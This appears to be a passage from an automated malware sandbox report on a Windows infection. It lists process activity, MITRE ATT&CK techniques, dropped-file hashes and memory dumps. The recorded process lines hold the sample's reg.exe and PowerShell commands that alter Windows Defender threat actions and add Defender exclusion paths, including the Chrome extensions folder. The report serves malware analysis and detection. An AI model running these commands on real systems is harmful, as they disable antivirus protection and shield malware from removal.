"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:1560

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:4556

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:4440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:3896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:1836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
9cfc7a98b758174d91a40515a37ef935

SHA1
ccd0eff396f99a725c697990544c345256a36215

SHA256
8385a9299312f77a2ced3780086eeeb82f9aa7ab0080d6a26235e09f066ec26e

SHA512
0a11eb0d96f5669c2e2bed54bbca25395b9d1749384e452fd2e97ca4457d8d04f58d764839fcba56eb5e081844d11f455a9d1342a086c21318300ebe93987001

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
19KB

MD5
737da3f98452865c0f0dafd1a4ed21bb

SHA1
7ee12458a67d449c9634e28abbca9e441a18ea24

SHA256
ec90e49010537845420b8574290cecb6b1a609b29b2b71bb079c7a1be2ebac02

SHA512
90931ad2d00edab7c6244e9086b317ca117d68b3edecc30e5b0d2120fd1b876a06ef8d9024c8a19688ab44fc90ef7f7ed3640c6b93bd0521c4525ade75f16873

Download Submit
C:\Users\Admin\AppData\Local\Temp\606eac9a
Filesize
5.9MB

MD5
dcc26dd014bad9eafa9066d3781b615d

SHA1
b0cb8621ca58a196ac73bed4e525deacfaf2d836

SHA256
69502ffc7e2b8946d420e682cd1421f58a17f489590f761c580ce2a4feb74ae3

SHA512
5a7804fdebe09aada86e327899fa7ce6830c26c426d398dd72ef68121c33e59c2572709a725f43d6f1d31c52e7b4ea10b2128d00d530a00ef9db9a8efef204e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7542fe38
Filesize
1.4MB

MD5
5c2c0d1a5439b7efb2d38b2a2023e4af

SHA1
c4ffa6ed239ad262dc26a8bb8d21573a28f2933a

SHA256
5681b8c555d2fbb3f0b3a49a5df328ee62cdf88f493e4f41ab6b6c139daa52a3

SHA512
462ba04d0f1edee2a737872a9013da9be6ca48177cb17473e65a5792b9c330ccbb2d61699571d05fc7567e6eb3a34c3d538cbdac384b3e505dcf4ce20be3ef0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS9CCC.tmp\Install.exe
Filesize
6.8MB

MD5
e77964e011d8880eae95422769249ca4

SHA1
8e15d7c4b7812a1da6c91738c7178adf0ff3200f

SHA256
f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50

SHA512
8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade

Download Submit
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\GGPEyvj.exe
Filesize
6.7MB

MD5
9f7e20094fd56642fa4f063d5e3d869f

SHA1
d46eaa5b47e1c97d2b040c823b4c2274f13c2b4d

SHA256
214d60bfdde3825869423038c2fbefc3edb622eed229d5a564b5943ee39929ea

SHA512
c31b012c1339f0f731ca3cdbff582b4782c26c7a899430ce75924c988f98dc49b4c00d6c65d831adace91534a080219bb6933c21e678ae4862b9ee8fb2ca50bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
Filesize
14.7MB

MD5
6955715b6ff15bdc153a2431cc395cca

SHA1
272e1eec66a1871b300484b2200b507a4abe5420

SHA256
a6d40169be9c151e9e6c86fe53d2bac3b4c2ddb41c0b650d961f8328939b4761

SHA512
cf82d27d7010be69ab1c288fef9d820905407c8018e2a91f3c39a0eda5e9378e0ff04d077520d556d46d7a9cb0a3a640d15a10ad4090e482be3c83930836019d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
Filesize
2.4MB

MD5
9fb4770ced09aae3b437c1c6eb6d7334

SHA1
fe54b31b0db8665aa5b22bed147e8295afc88a03

SHA256
a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3

SHA512
140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\relay.dll
Filesize
1.5MB

MD5
7d2f87123e63950159fb2c724e55bdab

SHA1
360f304a6311080e1fead8591cb4659a8d135f2d

SHA256
b3483bb771948ed8d3f76faaa3606c8ef72e3d2d355eaa652877e21e0651aa9a

SHA512
6cb8d27ebcfdf9e472c0a6fff86e6f4ec604b8f0f21c197ba6d5b76b703296c10c8d7c4fb6b082c7e77f5c35d364bcffd76ae54137e2c8944c1ea7bb9e2e5f08

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\somebody.rtf
Filesize
24KB

MD5
ff36ebcf134c8846aea77446867e5bc6

SHA1
53fdf2c0bec711e377edb4f97cd147728fb568f6

SHA256
e1c256e5a7f17cb64740223084009f37bddccc49b05e881133412057689b04e9

SHA512
b07d5065dd39843c8c7bdfccdd8d39f44b1ce9fe100a2fcf7210549ea1d46bcac54080cf91eff0a05360b26233c542daabdbd5d3f096a5bf0e366583ddb29ec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\spawn.xml
Filesize
1.3MB

MD5
2d8de35aa00138b2bfc4fb0fc3d0f58b

SHA1
28c2d84e01815702c230da456aaa17c7d2519186

SHA256
19340e9202db71d8010563c8b8d325cbef5d8448a8df2ad730e74a5a46e36dac

SHA512
378116bc71de9f968aaef6ca27944e341a9a825a92831f5834c396160581f5e3656d3b6d1c2a304a65a74c0dd9ca0c50fb0e0016b6174d1fab68909ea1c95128

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iyuajvey.mko.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
Filesize
3KB

MD5
20a134f3621e3f62a87d5c65b1b3dbfb

SHA1
c76695c1da843bb8b8c42f47e8229c45def84dfd

SHA256
f7eddc6f92fa79efeefdf03cbe923baf335c70a27f7dccc552eff0a5b76d2b90

SHA512
7457b76e88ac7ed2b8b880855295b798cafdc34ca0a236437f409adbd57b1bef6d261ae1ba4f1564ff2960d156616a01c87a047a01781c7517afd702e7b5c034

Download Submit
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
Filesize
2KB

MD5
609802a3e79f746f4fb4e3bcc45e8e1d

SHA1
eab175085b9c14585ab1b77f7e95c4bb16d5a98b

SHA256
d2764d6209aeb04d6be775b61b73d276c651eae3d1796702ab29623754fe9a57

SHA512
c9c32b9b2e94888e09be690a683d19228d6c510fba82fbe4cd96614f20ff1e42032ce52355470e29b6ceb91065665f450a7d40d53787026e81159a114c928736

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAF19.tmp
Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1d8.0.exe
Filesize
306KB

MD5
9e7bd4e6b0220bbb8c4068a02939e692

SHA1
92b8c83e84d6823bf4cf5238f368c27e5243241d

SHA256
a547ce72c56e28616970d53b15e05cf4532a20384cae7a72b8428789a48028ef

SHA512
7c1a0dcdcbeb988679ad24cbef85bd0b3f6c6c41c8699d506be3a1d6b0542fff0f6ec85eb53fe98278f787cd108771e2d168e2a9080327706edc629c41f57522

Download Submit
C:\Users\Admin\AppData\Local\Temp\u1d8.1.exe
Filesize
4.6MB

MD5
397926927bca55be4a77839b1c44de6e

SHA1
e10f3434ef3021c399dbba047832f02b3c898dbd

SHA256
4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

SHA512
cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

Download Submit
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
Filesize
40B

MD5
4b84feed959a2c9ddd40ed0aef9cb3ac

SHA1
a14edd718c25ba210117bf6b6c4b14e831f6234b

SHA256
2cd86ac09d432dee6480a25c3ccc60878e222918ba6f878140718cd788685495

SHA512
b0108b5f4edde82c8d9c70b5579b1495acd28acc8ed01ecb3e404dfbfd3d1794834b013110848df90c47e473e267679689e7c3564034263e83465583608e347e

Download Submit
C:\Users\Admin\Pictures\0CfbmjmXHVhhdSsidg7uqAeb.exe
Filesize
6.5MB

MD5
5d5da0738299d8893b79a6c926765e5f

SHA1
b05c2cfd30ca1c163cb829b7e7e5ea2d6c57d1d1

SHA256
53c80bee05d28fe65ab0ae6459753fe7b804c0b68b85faaf828576687ef28ca3

SHA512
d9fffe943131e71762f5e2e1ad3d23053069f0f028054be9ec2c8491a6812adadacbf099ab8fa79ca9916ceda14ccaedfe4a0e1e5235871a97145ef77d7b0b26

Download Submit
C:\Users\Admin\Pictures\DLKbrKiQe1hq9PYyAmiHC30n.exe
Filesize
7KB

MD5
5b423612b36cde7f2745455c5dd82577

SHA1
0187c7c80743b44e9e0c193e993294e3b969cc3d

SHA256
e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09

SHA512
c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

Download Submit
C:\Users\Admin\Pictures\UnOvcSdDh4WNfquLMhVlCFPb.exe
Filesize
5.1MB

MD5
c9f033104c17a7f43c3d2a0b5bac7935

SHA1
f6a28a4921f181b810ceba18ef821060e6ac2c30

SHA256
887ed8e53e09cf3c98781e2e8a7a0df36f25d48a7d60e78f03d1a304afb8b55d

SHA512
ca9d7ba961ea3465a937fcae6e65003c82958fcf1d280228f98a633bd02945c1b3dd0bb79de5dedc4f1e7c275828e763ab8f6208d37c7f22ab86f9687afdcc29

Download Submit
C:\Users\Admin\Pictures\gL3O98AfhmsCpD8gaad1PXlS.exe
Filesize
3.8MB

MD5
193692e1cf957eef7e6cf2f6bc74be86

SHA1
9d1f849b57c96ca71f0f90c73de97fa912b691d7

SHA256
fcc22a367ed0a8d8de94f5159ab12c32606f97326b832eb47327b7707ba457a6

SHA512
d0bcad2b98e5efc9c767f9a6ad87a6d62638131753bff22b21b883d90c23be17b65594b6d8c4510b255f28806b2a1dc2a01fc0e2138c3146d6e64abcd4a37697

Download Submit
C:\Users\Admin\Pictures\vaa0AZQ5oBlUsf402TW8rOEJ.exe
Filesize
4.2MB

MD5
1842fc317e5a1d69802a698ae55c38f2

SHA1
151e6beea179734ac936b9a09553694497ac25b5

SHA256
3a28b148d121751482a29d954aeed15f8ae208f86cd3ed6b819c5c5c842e0cf9

SHA512
c625d83b286c3e704f43ec80a4fed5c91bba6929c1c89e23bdc642d8778ea063507b578a7ef74368c815f4baf03fc1a8edfb4b3d9449619c3651a8cf33b139c2

Download Submit
C:\Users\Admin\Pictures\zf5jr9DDdhQj1bvtQNw4Gpck.exe
Filesize
412KB

MD5
de80642fb2f8899376ddd32843483e69

SHA1
607ba145e991b4e105d1dadb14fe2ac4b9263582

SHA256
9e3c984d86db667bc29a0b19ca3d5fe5298d1e57ffe935d26ab8903cdc795d96

SHA512
1a2f413b9bee069706f2b639f11cfe65bd6b503c9f81c5ec370d514ad2132c8eb558d4f985234089b2496c094b7ac71e61b2b7c620f1a297b22b4111a6488a66

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
e33ed3d4cc9b2e5a08ae25747ef47620

SHA1
e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7

SHA256
0e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f

SHA512
9e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini
Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Filesize
1KB

MD5
cdfd60e717a44c2349b553e011958b85

SHA1
431136102a6fb52a00e416964d4c27089155f73b

SHA256
0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f

SHA512
dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

Download Submit
\Users\Admin\AppData\Local\Temp\Opera_installer_2404182247564524216.dll
Filesize
4.6MB

MD5
0415cb7be0361a74a039d5f31e72fa65

SHA1
46ae154436c8c059ee75cbc6a18ccda96bb2021d

SHA256
bb38a8806705980ee3e9181c099e8d5c425e6c9505a88e5af538ca6a48951798

SHA512
f71c2b9e1559aa4eb2d72f852ef9807c781d4a7b96b8e0c2c53b895885319146bd43aa6e4223d43159f3d40bc60704206404dc034500e47fca0a94e53b60239e

Download Submit
\Users\Admin\AppData\Local\Temp\Zqicom_beta\UIxMarketPlugin.dll
Filesize
1.6MB

MD5
8f75e17a8bf3de6e22e77b5586f8a869

SHA1
e0bf196cfc19a8772e003b9058bdc211b419b261

SHA256
5f10a9fdcac32e93b1cebc365868ee3266f80c2734524b4aa7b6ea54e123f985

SHA512
5a1e78613ad90cb0dc855d8a935b136722749889b66d4d8fc0f52438f0a4f4c8c31fbb981e9c6a13ffb2cc2b77fe0747204b63a91c6fff4646eed915387c8d7d

Download Submit
memory/316-914-0x0000000000400000-0x0000000003009000-memory.dmp

Filesize
44.0MB

Download
memory/980-862-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/980-894-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/980-881-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/1392-331-0x0000000010000000-0x0000000013BC3000-memory.dmp

Filesize
59.8MB

Download
memory/1392-341-0x0000000000380000-0x00000000030A5000-memory.dmp

Filesize
45.1MB

Download
memory/1772-266-0x0000000000400000-0x0000000002C4A000-memory.dmp

Filesize
40.3MB

Download
memory/1772-17-0x0000000002EA0000-0x0000000002FA0000-memory.dmp

Filesize
1024KB

Download
memory/1772-704-0x0000000000400000-0x0000000002C4A000-memory.dmp

Filesize
40.3MB

Download
memory/1772-79-0x0000000004880000-0x00000000048ED000-memory.dmp

Filesize
436KB

Download
memory/1772-19-0x0000000000400000-0x0000000002C4A000-memory.dmp

Filesize
40.3MB

Download
memory/1772-88-0x0000000002EA0000-0x0000000002FA0000-memory.dmp

Filesize
1024KB

Download
memory/1772-18-0x0000000004880000-0x00000000048ED000-memory.dmp

Filesize
436KB

Download
memory/2044-911-0x0000000010000000-0x0000000013BC3000-memory.dmp

Filesize
59.8MB

Download
memory/2080-708-0x00007FFFC7CB0000-0x00007FFFC7E1A000-memory.dmp

Filesize
1.4MB

Download
memory/2080-845-0x00007FFFC7CB0000-0x00007FFFC7E1A000-memory.dmp

Filesize
1.4MB

Download
memory/2080-657-0x0000000000AD0000-0x00000000019AD000-memory.dmp

Filesize
14.9MB

Download
memory/2080-693-0x00007FFFC7CB0000-0x00007FFFC7E1A000-memory.dmp

Filesize
1.4MB

Download
memory/2088-44-0x00000000033D0000-0x00000000037D6000-memory.dmp

Filesize
4.0MB

Download
memory/2088-879-0x0000000000400000-0x0000000003009000-memory.dmp

Filesize
44.0MB

Download
memory/2088-458-0x00000000033D0000-0x00000000037D6000-memory.dmp

Filesize
4.0MB

Download
memory/2088-293-0x0000000000400000-0x0000000003009000-memory.dmp

Filesize
44.0MB

Download
memory/2088-43-0x0000000000400000-0x0000000003009000-memory.dmp

Filesize
44.0MB

Download
memory/2088-856-0x0000000000400000-0x0000000003009000-memory.dmp

Filesize
44.0MB

Download
memory/2088-875-0x0000000000400000-0x0000000003009000-memory.dmp

Filesize
44.0MB

Download
memory/2088-39-0x0000000005080000-0x000000000596B000-memory.dmp

Filesize
8.9MB

Download
memory/2164-84-0x00007FFFD3D80000-0x00007FFFD3F5B000-memory.dmp

Filesize
1.9MB

Download
memory/2164-68-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp

Filesize
10.9MB

Download
memory/2164-85-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp

Filesize
10.9MB

Download
memory/2164-352-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp

Filesize
10.9MB

Download
memory/2164-78-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp

Filesize
10.9MB

Download
memory/2164-80-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp

Filesize
10.9MB

Download
memory/2164-87-0x00007FFF80000000-0x00007FFF80002000-memory.dmp

Filesize
8KB

Download
memory/2164-81-0x00007FFFD3230000-0x00007FFFD32DE000-memory.dmp

Filesize
696KB

Download
memory/2164-83-0x00007FFFD02C0000-0x00007FFFD0509000-memory.dmp

Filesize
2.3MB

Download
memory/2164-82-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp

Filesize
10.9MB

Download
memory/2164-86-0x00007FFF80030000-0x00007FFF80031000-memory.dmp

Filesize
4KB

Download
memory/2164-67-0x00007FF6E9C50000-0x00007FF6EA732000-memory.dmp

Filesize
10.9MB

Download
memory/2180-77-0x0000000004E40000-0x0000000004E50000-memory.dmp

Filesize
64KB

Download
memory/2180-2-0x0000000004E40000-0x0000000004E50000-memory.dmp

Filesize
64KB

Download
memory/2180-1-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/2180-0-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2180-73-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/2276-75-0x0000000000880000-0x0000000000980000-memory.dmp

Filesize
1024KB

Download
memory/2276-100-0x0000000000400000-0x000000000084E000-memory.dmp

Filesize
4.3MB

Download
memory/2276-70-0x0000000002470000-0x0000000002497000-memory.dmp

Filesize
156KB

Download
memory/2276-71-0x0000000000400000-0x000000000084E000-memory.dmp

Filesize
4.3MB

Download
memory/2432-52-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/2432-615-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/2432-61-0x0000000007830000-0x0000000007E58000-memory.dmp

Filesize
6.2MB

Download
memory/2432-66-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/2432-290-0x000000007E4F0000-0x000000007E500000-memory.dmp

Filesize
64KB

Download
memory/2432-316-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/2432-460-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/2432-97-0x0000000007E60000-0x0000000007EC6000-memory.dmp

Filesize
408KB

Download
memory/2432-269-0x000000006E4A0000-0x000000006E7F0000-memory.dmp

Filesize
3.3MB

Download
memory/2432-64-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/2432-98-0x00000000080B0000-0x0000000008116000-memory.dmp

Filesize
408KB

Download
memory/2432-267-0x000000006E450000-0x000000006E49B000-memory.dmp

Filesize
300KB

Download
memory/2432-653-0x00000000050B0000-0x00000000050C0000-memory.dmp

Filesize
64KB

Download
memory/2432-263-0x000000000A400000-0x000000000A433000-memory.dmp

Filesize
204KB

Download
memory/2452-609-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/2452-459-0x0000000005240000-0x0000000005250000-memory.dmp

Filesize
64KB

Download
memory/2452-457-0x0000000005240000-0x0000000005250000-memory.dmp

Filesize
64KB

Download
memory/2452-456-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/2664-246-0x00000000089D0000-0x0000000008A46000-memory.dmp

Filesize
472KB

Download
memory/2664-292-0x0000000009A70000-0x0000000009B04000-memory.dmp

Filesize
592KB

Download
memory/2664-286-0x0000000009850000-0x00000000098F5000-memory.dmp

Filesize
660KB

Download
memory/2664-89-0x0000000006B30000-0x0000000006B52000-memory.dmp

Filesize
136KB

Download
memory/2664-461-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/2664-57-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/2664-60-0x00000000067B0000-0x00000000067C0000-memory.dmp

Filesize
64KB

Download
memory/2664-301-0x000000007F0A0000-0x000000007F0B0000-memory.dmp

Filesize
64KB

Download
memory/2664-99-0x0000000007520000-0x0000000007870000-memory.dmp

Filesize
3.3MB

Download
memory/2664-65-0x00000000067B0000-0x00000000067C0000-memory.dmp

Filesize
64KB

Download
memory/2664-53-0x00000000066D0000-0x0000000006706000-memory.dmp

Filesize
216KB

Download
memory/2664-324-0x00000000067B0000-0x00000000067C0000-memory.dmp

Filesize
64KB

Download
memory/2664-101-0x0000000007870000-0x000000000788C000-memory.dmp

Filesize
112KB

Download
memory/2664-264-0x000000006E450000-0x000000006E49B000-memory.dmp

Filesize
300KB

Download
memory/2664-265-0x000000006E4A0000-0x000000006E7F0000-memory.dmp

Filesize
3.3MB

Download
memory/2664-102-0x0000000007890000-0x00000000078DB000-memory.dmp

Filesize
300KB

Download
memory/2664-160-0x0000000008910000-0x000000000894C000-memory.dmp

Filesize
240KB

Download
memory/2664-268-0x00000000097F0000-0x000000000980E000-memory.dmp

Filesize
120KB

Download
memory/2664-649-0x00000000067B0000-0x00000000067C0000-memory.dmp

Filesize
64KB

Download
memory/2964-859-0x000000006BD50000-0x000000006BECB000-memory.dmp

Filesize
1.5MB

Download
memory/2964-854-0x00007FFFD3D80000-0x00007FFFD3F5B000-memory.dmp

Filesize
1.9MB

Download
memory/3920-916-0x0000000000400000-0x0000000003009000-memory.dmp

Filesize
44.0MB

Download
memory/4272-795-0x00007FFFD3D80000-0x00007FFFD3F5B000-memory.dmp

Filesize
1.9MB

Download
memory/4272-846-0x000000006BD50000-0x000000006BECB000-memory.dmp

Filesize
1.5MB

Download
memory/4272-790-0x000000006BD50000-0x000000006BECB000-memory.dmp

Filesize
1.5MB

Download
memory/4704-757-0x00007FFFD3D80000-0x00007FFFD3F5B000-memory.dmp

Filesize
1.9MB

Download
memory/4704-750-0x000000006BD50000-0x000000006BECB000-memory.dmp

Filesize
1.5MB

Download
memory/4716-864-0x0000000000400000-0x0000000003009000-memory.dmp

Filesize
44.0MB

Download
memory/4716-877-0x0000000000400000-0x0000000003009000-memory.dmp

Filesize
44.0MB

Download
